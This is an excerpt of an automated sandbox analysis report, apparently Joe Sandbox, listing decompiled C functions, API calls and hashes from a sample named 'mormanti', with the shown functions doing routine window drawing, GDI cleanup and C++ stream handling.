                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapClientObjectRectReleaseSelect
                                                                                                • String ID:
                                                                                                • API String ID: 4043710568-0
                                                                                                • Opcode ID: 6639f86322639685d7d24f3f9ada74817a804ee3b36deaef86ee848f2411f0b5
                                                                                                • Instruction ID: f5d02cee94193154edec8b93df7064e39313fa69b13995866e95c490347eb79c
                                                                                                • Opcode Fuzzy Hash: 6639f86322639685d7d24f3f9ada74817a804ee3b36deaef86ee848f2411f0b5
                                                                                                • Instruction Fuzzy Hash: 9701E876500208EFCF049FA9EC48BEE7F79FB4A3957008419FA01E3224E730A940DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00C111BA() {
                                                                                                				void* __esi;
                                                                                                				struct HDC__* _t10;
                                                                                                				void* _t11;
                                                                                                				void* _t12;
                                                                                                				int _t13;
                                                                                                
                                                                                                				E00C11C1E(0xc165f4);
                                                                                                				E00C11C1E(0xc16610);
                                                                                                				DeleteObject( *0xc165c0);
                                                                                                				DeleteObject( *0xc165c4);
                                                                                                				DeleteObject( *0xc165c8);
                                                                                                				DeleteObject( *0xc165cc);
                                                                                                				DeleteObject( *0xc165d0);
                                                                                                				DeleteObject( *0xc165d4);
                                                                                                				 *0xc165c0 = 0;
                                                                                                				 *0xc165c4 = 0;
                                                                                                				 *0xc165c8 = 0;
                                                                                                				 *0xc165cc = 0;
                                                                                                				 *0xc165d0 = 0;
                                                                                                				 *0xc165d4 = 0;
                                                                                                				_pop(_t19);
                                                                                                				_t10 =  *0xc165a0; // 0x0
                                                                                                				if(_t10 != 0) {
                                                                                                					DeleteDC(_t10);
                                                                                                					 *0xc165a0 =  *0xc165a0 & 0x00000000;
                                                                                                				}
                                                                                                				_t11 =  *0xc165a4; // 0x0
                                                                                                				if(_t11 != 0) {
                                                                                                					DeleteObject(_t11);
                                                                                                					 *0xc165a4 =  *0xc165a4 & 0x00000000;
                                                                                                				}
                                                                                                				_t12 =  *0xc165d8; // 0x0
                                                                                                				if(_t12 != 0) {
                                                                                                					_t13 = DeleteObject(_t12);
                                                                                                					 *0xc165d8 =  *0xc165d8 & 0x00000000;
                                                                                                					return _t13;
                                                                                                				}
                                                                                                				return _t12;
                                                                                                			}








                                                                                                0x00c111c0
                                                                                                0x00c111ca
                                                                                                0x00c111db
                                                                                                0x00c111e3
                                                                                                0x00c111eb
                                                                                                0x00c111f3
                                                                                                0x00c111fb
                                                                                                0x00c11203
                                                                                                0x00c11207
                                                                                                0x00c1120c
                                                                                                0x00c11211
                                                                                                0x00c11216
                                                                                                0x00c1121b
                                                                                                0x00c11220
                                                                                                0x00c11225
                                                                                                0x00c1122b
                                                                                                0x00c11232
                                                                                                0x00c11235
                                                                                                0x00c1123b
                                                                                                0x00c1123b
                                                                                                0x00c11242
                                                                                                0x00c11250
                                                                                                0x00c11253
                                                                                                0x00c11255
                                                                                                0x00c11255
                                                                                                0x00c1125c
                                                                                                0x00c11263
                                                                                                0x00c11266
                                                                                                0x00c11268
                                                                                                0x00000000
                                                                                                0x00c11268
                                                                                                0x00c11270

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteObject$??3@
                                                                                                • String ID:
                                                                                                • API String ID: 3140518222-0
                                                                                                • Opcode ID: 3ac9f387272ff8b478c8f1a6f58182ddf51d255a94430ef50e58e2bbb14f3913
                                                                                                • Instruction ID: cb56bf464c8c4170a4a9be68876ff5f3528efd920cb0c8c5f21efbf5a52bb918
                                                                                                • Opcode Fuzzy Hash: 3ac9f387272ff8b478c8f1a6f58182ddf51d255a94430ef50e58e2bbb14f3913
                                                                                                • Instruction Fuzzy Hash: 1CF014719411249ECB51AF25ED057CD3EABF70B3643058077D508D2279EB320894EF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 32%
                                                                                                			E00C11EAD(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t49;
                                                                                                				intOrPtr _t53;
                                                                                                				intOrPtr _t57;
                                                                                                				intOrPtr _t61;
                                                                                                				void* _t72;
                                                                                                				intOrPtr _t73;
                                                                                                				void* _t76;
                                                                                                				intOrPtr _t77;
                                                                                                				signed int _t78;
                                                                                                				signed int _t80;
                                                                                                				void* _t81;
                                                                                                				intOrPtr _t89;
                                                                                                				void* _t91;
                                                                                                				intOrPtr* _t93;
                                                                                                				void* _t94;
                                                                                                				signed int _t100;
                                                                                                
                                                                                                				_push(0x14);
                                                                                                				E00C130EB(E00C13308, __ebx, __edi, __esi);
                                                                                                				_t93 =  *((intOrPtr*)(_t94 + 8));
                                                                                                				_t49 =  *((intOrPtr*)(_t94 + 0xc));
                                                                                                				_t80 = 0;
                                                                                                				 *(_t94 - 0x14) = 0;
                                                                                                				_t81 = _t49 + 1;
                                                                                                				do {
                                                                                                					_t89 =  *_t49;
                                                                                                					_t49 = _t49 + 1;
                                                                                                				} while (_t89 != 0);
                                                                                                				_t91 = _t49 - _t81;
                                                                                                				_t53 =  *((intOrPtr*)( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18));
                                                                                                				if(_t53 > 0 && _t53 > _t91) {
                                                                                                					_t78 = _t53 - _t91;
                                                                                                					_t100 = _t78;
                                                                                                					_t80 = _t78;
                                                                                                				}
                                                                                                				_push(_t94 - 0x20);
                                                                                                				E00C11CCA(_t91, _t93, _t100);
                                                                                                				 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
                                                                                                				if( *((char*)(_t94 - 0x1c)) != 0) {
                                                                                                					 *(_t94 - 4) = 1;
                                                                                                					_t57 =  *((intOrPtr*)( *_t93 + 4));
                                                                                                					__eflags = ( *(_t57 + _t93 + 0x10) & 0x000001c0) - 0x40;
                                                                                                					if(( *(_t57 + _t93 + 0x10) & 0x000001c0) == 0x40) {
                                                                                                						L12:
                                                                                                						_t61 =  *((intOrPtr*)( *_t93 + 4));
                                                                                                						__imp__?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z( *((intOrPtr*)(_t94 + 0xc)), _t91);
                                                                                                						__eflags = _t61 - _t91;
                                                                                                						if(_t61 == _t91) {
                                                                                                							while(1) {
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 <= 0) {
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								_t72 =  *((intOrPtr*)( *_t93 + 4)) + _t93;
                                                                                                								_t73 =  *((intOrPtr*)(_t72 + 0x28));
                                                                                                								 *((char*)(_t94 - 0x18)) =  *((intOrPtr*)(_t72 + 0x30));
                                                                                                								__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z( *((intOrPtr*)(_t94 - 0x18)));
                                                                                                								__eflags = _t73 - 0xffffffff;
                                                                                                								if(_t73 != 0xffffffff) {
                                                                                                									_t80 = _t80 - 1;
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									 *(_t94 - 0x14) =  *(_t94 - 0x14) | 0x00000004;
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								L21:
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *(_t94 - 0x14) = 4;
                                                                                                						}
                                                                                                					} else {
                                                                                                						while(1) {
                                                                                                							__eflags = _t80;
                                                                                                							if(_t80 <= 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t76 =  *((intOrPtr*)( *_t93 + 4)) + _t93;
                                                                                                							_t77 =  *((intOrPtr*)(_t76 + 0x28));
                                                                                                							 *((char*)(_t94 - 0x18)) =  *((intOrPtr*)(_t76 + 0x30));
                                                                                                							__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z( *((intOrPtr*)(_t94 - 0x18)));
                                                                                                							__eflags = _t77 - 0xffffffff;
                                                                                                							if(_t77 != 0xffffffff) {
                                                                                                								_t80 = _t80 - 1;
                                                                                                								continue;
                                                                                                							} else {
                                                                                                								_t22 = _t94 - 0x14;
                                                                                                								 *_t22 =  *(_t94 - 0x14) | 0x00000004;
                                                                                                								__eflags =  *_t22;
                                                                                                							}
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags =  *(_t94 - 0x14);
                                                                                                						if( *(_t94 - 0x14) == 0) {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                					}
                                                                                                					L14:
                                                                                                					 *( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18) =  *( *((intOrPtr*)( *_t93 + 4)) + _t93 + 0x18) & 0x00000000;
                                                                                                					_t33 = _t94 - 4;
                                                                                                					 *_t33 =  *(_t94 - 4) & 0x00000000;
                                                                                                					__eflags =  *_t33;
                                                                                                				} else {
                                                                                                					 *(_t94 - 0x14) = 4;
                                                                                                				}
                                                                                                				__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z( *(_t94 - 0x14), 0);
                                                                                                				 *(_t94 - 4) =  *(_t94 - 4) | 0xffffffff;
                                                                                                				_push(_t94 - 0x20);
                                                                                                				E00C11D28(_t93,  *(_t94 - 4));
                                                                                                				return E00C13121(_t93);
                                                                                                				goto L21;
                                                                                                			}



















                                                                                                0x00c11ead
                                                                                                0x00c11eb4
                                                                                                0x00c11eb9
                                                                                                0x00c11ebc
                                                                                                0x00c11ebf
                                                                                                0x00c11ec1
                                                                                                0x00c11ec4
                                                                                                0x00c11ec7
                                                                                                0x00c11ec7
                                                                                                0x00c11ec9
                                                                                                0x00c11eca
                                                                                                0x00c11ed0
                                                                                                0x00c11ed7
                                                                                                0x00c11edd
                                                                                                0x00c11ee3
                                                                                                0x00c11ee3
                                                                                                0x00c11ee5
                                                                                                0x00c11ee5
                                                                                                0x00c11eea
                                                                                                0x00c11eeb
                                                                                                0x00c11ef0
                                                                                                0x00c11ef8
                                                                                                0x00c11f03
                                                                                                0x00c11f09
                                                                                                0x00c11f15
                                                                                                0x00c11f18
                                                                                                0x00c11f48
                                                                                                0x00c11f4a
                                                                                                0x00c11f55
                                                                                                0x00c11f5b
                                                                                                0x00c11f5d
                                                                                                0x00c11fa2
                                                                                                0x00c11fa2
                                                                                                0x00c11fa4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11fab
                                                                                                0x00c11fb0
                                                                                                0x00c11fb3
                                                                                                0x00c11fbb
                                                                                                0x00c11fc1
                                                                                                0x00c11fc4
                                                                                                0x00c11fcc
                                                                                                0x00000000
                                                                                                0x00c11fc6
                                                                                                0x00c11fc6
                                                                                                0x00000000
                                                                                                0x00c11fc6
                                                                                                0x00000000
                                                                                                0x00c11fc4
                                                                                                0x00c11f5f
                                                                                                0x00c11f5f
                                                                                                0x00c11f5f
                                                                                                0x00c11f1a
                                                                                                0x00c11f1a
                                                                                                0x00c11f1a
                                                                                                0x00c11f1c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11f23
                                                                                                0x00c11f28
                                                                                                0x00c11f2b
                                                                                                0x00c11f33
                                                                                                0x00c11f39
                                                                                                0x00c11f3c
                                                                                                0x00c11f9c
                                                                                                0x00000000
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00c11f3e
                                                                                                0x00000000
                                                                                                0x00c11f3c
                                                                                                0x00c11f42
                                                                                                0x00c11f46
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c11f46
                                                                                                0x00c11f66
                                                                                                0x00c11f6d
                                                                                                0x00c11f71
                                                                                                0x00c11f71
                                                                                                0x00c11f71
                                                                                                0x00c11efa
                                                                                                0x00c11efa
                                                                                                0x00c11efa
                                                                                                0x00c11f81
                                                                                                0x00c11f87
                                                                                                0x00c11f8e
                                                                                                0x00c11f8f
                                                                                                0x00c11f9b
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00C11EB4
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F33
                                                                                                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z.MSVCP90(?,?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F55
                                                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP90(?,00000000), ref: 00C11F81
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?), ref: 00C11FBB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog3_catch
                                                                                                • String ID:
                                                                                                • API String ID: 1934335076-0
                                                                                                • Opcode ID: 42d4b20e9b5760a3dbce8ed36a7011867400e62ba9c9d2efdd2165f8666af61a
                                                                                                • Instruction ID: 016cf85252668003b2648736761e1e82606584cd3335aae2cfd99635070e640f
                                                                                                • Opcode Fuzzy Hash: 42d4b20e9b5760a3dbce8ed36a7011867400e62ba9c9d2efdd2165f8666af61a
                                                                                                • Instruction Fuzzy Hash: 6C415034A002458FCB11CF99C589BED7BF0AF1A314F284558EA51DB3A2C739DE85DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 45%
                                                                                                			E00C11DA6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t11;
                                                                                                				void* _t18;
                                                                                                				void* _t19;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                
                                                                                                				_t19 = __edx;
                                                                                                				_t18 = __ecx;
                                                                                                				_push(0x44);
                                                                                                				E00C130B8(E00C13350, __ebx, __edi, __esi);
                                                                                                				_t11 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                				_t23 = 0x6666666 - _t11;
                                                                                                				if(0x6666666 < __edx) {
                                                                                                					_t18 = _t24 - 0x28;
                                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z("list<T> too long");
                                                                                                					_t3 = _t24 - 4;
                                                                                                					 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                                                					_push(_t24 - 0x28);
                                                                                                					_push(_t24 - 0x50);
                                                                                                					E00C11083(_t23,  *_t3);
                                                                                                					_push(0xc14748);
                                                                                                					_t11 = _t24 - 0x50;
                                                                                                					_push(_t11);
                                                                                                					L00C131EC();
                                                                                                				}
                                                                                                				_t12 = _t11 + _t19;
                                                                                                				 *((intOrPtr*)(_t18 + 0x18)) = _t11 + _t19;
                                                                                                				return E00C13121(_t12);
                                                                                                			}








                                                                                                0x00c11da6
                                                                                                0x00c11da6
                                                                                                0x00c11da6
                                                                                                0x00c11dad
                                                                                                0x00c11db2
                                                                                                0x00c11dba
                                                                                                0x00c11dbe
                                                                                                0x00c11dc5
                                                                                                0x00c11dc8
                                                                                                0x00c11dce
                                                                                                0x00c11dce
                                                                                                0x00c11dd5
                                                                                                0x00c11dd9
                                                                                                0x00c11dda
                                                                                                0x00c11ddf
                                                                                                0x00c11de4
                                                                                                0x00c11de7
                                                                                                0x00c11de8
                                                                                                0x00c11de8
                                                                                                0x00c11ded
                                                                                                0x00c11def
                                                                                                0x00c11df7

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C11DAD
                                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(list<T> too long,00000044,00C11C74,?,?,?,?,00C165F4,?,00C1176B,00C165F4,?,?,00000000), ref: 00C11DC8
                                                                                                  • Part of subcall function 00C11083: __EH_prolog3.LIBCMT ref: 00C1108A
                                                                                                  • Part of subcall function 00C11083: ??0exception@std@@QAE@XZ.MSVCR90(00000000,00C11DDF,?,?), ref: 00C11094
                                                                                                  • Part of subcall function 00C11083: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00C110AA
                                                                                                • _CxxThrowException.MSVCR90(?,00C14748), ref: 00C11DE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prolog3U?$char_traits@V?$allocator@$??0exception@std@@ExceptionThrowV01@@
                                                                                                • String ID: list<T> too long
                                                                                                • API String ID: 265151731-4027344264
                                                                                                • Opcode ID: ab2da16fa2daeb6d69ec4c56d119111b970747fd1431d735683dd4ecdb1c03cd
                                                                                                • Instruction ID: 30e903c907c844b2f57704f5f81bfbdf00e215bef716f57bff4e8b732d486b52
                                                                                                • Opcode Fuzzy Hash: ab2da16fa2daeb6d69ec4c56d119111b970747fd1431d735683dd4ecdb1c03cd
                                                                                                • Instruction Fuzzy Hash: 30F0A072D00248ABCF04EBE0E846ADC77B86B0A304FA80028E100E7150EA75CB85F7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C12435(struct HINSTANCE__* __eax, int _a4) {
                                                                                                				struct tagRECT _v20;
                                                                                                				struct HWND__* _t24;
                                                                                                
                                                                                                				 *0xc1640c = __eax;
                                                                                                				_t24 = CreateWindowExW(0, 0xc16410, 0xc164d8, 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __eax, 0);
                                                                                                				if(_t24 != 0) {
                                                                                                					GetClientRect(_t24,  &_v20);
                                                                                                					E00C11129(_v20.right - _v20.left, _v20.bottom - _v20.top);
                                                                                                					ShowWindow(_t24, _a4);
                                                                                                					UpdateWindow(_t24);
                                                                                                					return 1;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}





                                                                                                0x00c12444
                                                                                                0x00c12467
                                                                                                0x00c1246b
                                                                                                0x00c12476
                                                                                                0x00c1248a
                                                                                                0x00c12495
                                                                                                0x00c1249c
                                                                                                0x00000000
                                                                                                0x00c124a4
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateWindowExW.USER32 ref: 00C12461
                                                                                                • GetClientRect.USER32 ref: 00C12476
                                                                                                • ShowWindow.USER32(00000000,00C1235C,?,?,00C1235C,?), ref: 00C12495
                                                                                                • UpdateWindow.USER32(00000000), ref: 00C1249C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientCreateRectShowUpdate
                                                                                                • String ID:
                                                                                                • API String ID: 2980773425-0
                                                                                                • Opcode ID: e538f873d972a54e773443fea960c5821c5e85220614da626e6234382dec7350
                                                                                                • Instruction ID: 046a31a6a618d5cf8b0d088eba916c7c231a82ceb2fa9a0c274777916678f684
                                                                                                • Opcode Fuzzy Hash: e538f873d972a54e773443fea960c5821c5e85220614da626e6234382dec7350
                                                                                                • Instruction Fuzzy Hash: 4B01FF76540124BE9710DBA9DC49EFF7FACEB4B660B204414F919D2150D624954196A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 61%
                                                                                                			E00C119A1(intOrPtr* __esi, struct HDC__* _a4, intOrPtr _a8) {
                                                                                                				char _v5;
                                                                                                				char _v6;
                                                                                                				char _v7;
                                                                                                				char _v8;
                                                                                                				struct HDC__* _v12;
                                                                                                				struct HDC__* _v16;
                                                                                                				struct HDC__* _t19;
                                                                                                				void* _t21;
                                                                                                				void* _t25;
                                                                                                				void* _t30;
                                                                                                				intOrPtr* _t31;
                                                                                                
                                                                                                				_t31 = __esi;
                                                                                                				_t19 = _a4;
                                                                                                				_t25 =  *((intOrPtr*)(__esi + 0xc)) -  *((intOrPtr*)(__esi + 4));
                                                                                                				_t30 =  *((intOrPtr*)(__esi + 8)) -  *__esi;
                                                                                                				_v16 = _t19;
                                                                                                				_v12 = CreateCompatibleDC(_t19);
                                                                                                				_t21 =  *0xc165d8; // 0x0
                                                                                                				if(_t21 == 0) {
                                                                                                					_push(_a8);
                                                                                                					_push(_v16);
                                                                                                					_t21 = E00C11A1F(__esi);
                                                                                                				}
                                                                                                				SelectObject(_v12, _t21);
                                                                                                				_v8 = 0;
                                                                                                				_v7 = 0;
                                                                                                				_v6 = 0xff;
                                                                                                				_v5 = 1;
                                                                                                				__imp__AlphaBlend(_v16,  *_t31,  *((intOrPtr*)(_t31 + 4)), _t30, _t25, _v12, 0, 0, _t30, _t25, _v8);
                                                                                                				return DeleteDC(_v12);
                                                                                                			}














                                                                                                0x00c119a1
                                                                                                0x00c119a7
                                                                                                0x00c119ae
                                                                                                0x00c119b5
                                                                                                0x00c119b8
                                                                                                0x00c119c1
                                                                                                0x00c119c4
                                                                                                0x00c119cb
                                                                                                0x00c119cd
                                                                                                0x00c119d2
                                                                                                0x00c119d5
                                                                                                0x00c119db
                                                                                                0x00c119e0
                                                                                                0x00c119e6
                                                                                                0x00c119ea
                                                                                                0x00c119ee
                                                                                                0x00c119f2
                                                                                                0x00c11a0c
                                                                                                0x00c11a1e

                                                                                                APIs
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00C119BB
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00C119E0
                                                                                                • AlphaBlend.MSIMG32(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 00C11A0C
                                                                                                • DeleteDC.GDI32(?), ref: 00C11A15
                                                                                                  • Part of subcall function 00C11A1F: OffsetRect.USER32(?,?,00000000), ref: 00C11A53
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: AlphaBlendCompatibleCreateDeleteObjectOffsetRectSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2925259497-0
                                                                                                • Opcode ID: 9843c6abacb897f562da379b821f7726391e4e0c7b5672ef64edef5d61ba351e
                                                                                                • Instruction ID: 72bb423b19cc41ddac3dd5fffff233b36b0239f50e1c0fb60626185dfc99f4e3
                                                                                                • Opcode Fuzzy Hash: 9843c6abacb897f562da379b821f7726391e4e0c7b5672ef64edef5d61ba351e
                                                                                                • Instruction Fuzzy Hash: B1113935900248FFDF119FA9DC48F8EBFB9FF4A710F108099F655A21A0C731AA54AB20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E00C11D28(void* __esi, void* __eflags) {
                                                                                                				void* _t10;
                                                                                                				intOrPtr* _t11;
                                                                                                				void* _t14;
                                                                                                				void* _t19;
                                                                                                				intOrPtr* _t21;
                                                                                                				void* _t22;
                                                                                                
                                                                                                				_t10 = E00C130B8(E00C132BF, _t14, _t19, __esi);
                                                                                                				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                                                				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                				__imp__?uncaught_exception@std@@YA_NXZ(0);
                                                                                                				if(_t10 == 0) {
                                                                                                					__imp__?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                                                                                				}
                                                                                                				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                				_t11 =  *_t21;
                                                                                                				_t12 =  *((intOrPtr*)( *((intOrPtr*)( *_t11 + 4)) + _t11 + 0x28));
                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)( *_t11 + 4)) + _t11 + 0x28)) != 0) {
                                                                                                					__imp__?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                                                                                				}
                                                                                                				return E00C13121(_t12);
                                                                                                			}









                                                                                                0x00c11d2f
                                                                                                0x00c11d34
                                                                                                0x00c11d37
                                                                                                0x00c11d3b
                                                                                                0x00c11d43
                                                                                                0x00c11d47
                                                                                                0x00c11d47
                                                                                                0x00c11d4d
                                                                                                0x00c11d51
                                                                                                0x00c11d58
                                                                                                0x00c11d5e
                                                                                                0x00c11d62
                                                                                                0x00c11d62
                                                                                                0x00c11d6d

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C11D2F
                                                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP90(00000000,00C11F94,?), ref: 00C11D3B
                                                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP90 ref: 00C11D47
                                                                                                • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP90 ref: 00C11D62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?uncaught_exception@std@@H_prolog3Osfx@?$basic_ostream@Unlock@?$basic_streambuf@
                                                                                                • String ID:
                                                                                                • API String ID: 3571924652-0
                                                                                                • Opcode ID: cbea2e82ea0336b9ecfa24c46ccdb8c4bc7403f7a2c9aed12364deeed6fc3b31
                                                                                                • Instruction ID: 6ed55b6245841511601a1b0bfb9ff908c3cb25e3e3f850785f4a192bd71a00c0
                                                                                                • Opcode Fuzzy Hash: cbea2e82ea0336b9ecfa24c46ccdb8c4bc7403f7a2c9aed12364deeed6fc3b31
                                                                                                • Instruction Fuzzy Hash: 27E06D38200240DFDB14EF65D459B9C77B1BF1B315F24815CE6529B3A1CB329E45EB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.8%
